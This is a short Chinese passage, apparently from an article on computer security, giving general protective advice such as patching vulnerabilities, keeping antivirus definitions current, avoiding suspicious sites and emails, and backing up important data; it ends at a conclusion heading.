对于接入互联网的电脑, 在使用过程中, 必须进行系统安全漏洞的弥补, 确保系统无安全隐患, 同时安装防毒杀毒程序, 并时时更新病毒库, 每间隔一段时间就要对计算机系统进行全方面病毒查杀, 必要时也要增加硬件防火墙, 培养良好的网络使用习惯, 不去点击存在病毒风险的网站, 在网络中下载软件资料前, 要对相关的数据及时查杀, 确保安全后, 方可下载, 不冒然接受来历不明的电子邮件防止被木马感染, 通过一系列的安全防范系统的建立, 会在一定程度上防范黑客程序的危害, 但是对于重要数据与密码, 还是需要电脑操作者及时进行备份与更新, 确保数据被破坏后能够及时恢复。

结语